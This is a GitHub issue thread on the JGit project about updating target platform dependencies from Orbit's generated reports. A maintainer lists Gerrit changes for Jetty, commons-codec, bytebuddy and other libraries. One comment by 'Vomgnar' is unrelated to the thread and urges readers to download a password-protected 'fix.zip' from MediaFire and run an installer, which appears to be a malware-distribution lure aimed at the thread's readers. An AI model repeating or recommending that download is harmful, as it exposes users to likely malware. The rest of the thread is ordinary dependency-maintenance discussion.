### ISSUE TITLE
Keep target platform dependencies up-to-date

### ISSUE THREAD

**Issue by merks** [eclipse-jgit/jgit#88]
### Description

As I've mentioned before, Orbit generates a report for JGit's target platform:

https://github.com/eclipse-orbit/orbit-simrel/blob/main/report/maven-osgi/jgit/REPORT.md

It also generates an updated dependencies.tpd

- https://github.com/eclipse-orbit/orbit-simrel/blob/main/report/maven-osgi/jgit/updated.tpd

that you can copy and paste into 

- https://github.com/eclipse-jgit/jgit/blob/master/org.eclipse.jgit.packaging/org.eclipse.jgit.target/maven/dependencies.tpd

The reports are generally regenerated 5+ times per week.

Please try to use this periodically.  The Jetty dependencies in particular are outdated and that result in duplicates in SimRel where you have needed to work around the mismatches versions problem but adding a Jetty repository, though not actually the current release of Jetty:

- https://github.com/eclipse-simrel/simrel.build/blob/4d17d9203654b0d721593ea81beddfa4bee5c12b/egit.aggrcon#L32-L34

While I could create a gerrit review for the changes it's likely far simpler to just copy and paste the above yourself and regenerate each *.target.

### Motivation

Once contributed to SimRel most likely the newer dependencies will be used so best to build and test with those.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by msohn** [comment]
- [Update jetty to 12.0.12](https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1199790)
- [Update commons-codec:commons-codec to 1.17.1](https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1199791)
- [Update commons-logging:commons-logging to 1.3.4](https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1199792)
- [Update bytebuddy to 1.15.0](https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1199793)
- [Update org.apache.commons:commons-lang3 to 3.16.0](https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1200134)
- [Update org.assertj:assertj-core to 3.26.3](https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1200135)
- [Update org.tukaani:xz to 1.10](https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1200136)
- [Update org.apache.commons:commons-compress to 1.27.1](https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1200137)
- [Update jakarta.servlet:jakarta.servlet-api](to 6.1.0 https://eclipse.gerrithub.io/c/eclipse-jgit/jgit/+/1200138)

**Comment by msohn** [comment]
thanks, it's a bit more work since we also need to update the mvn and bazel builds.
With our final contribution to 2024-09 the open updates should go down to the major upgrades of hamcrest and slf4j.

I updated all dependencies and bookmarked the generated report to revisit it more regularly.
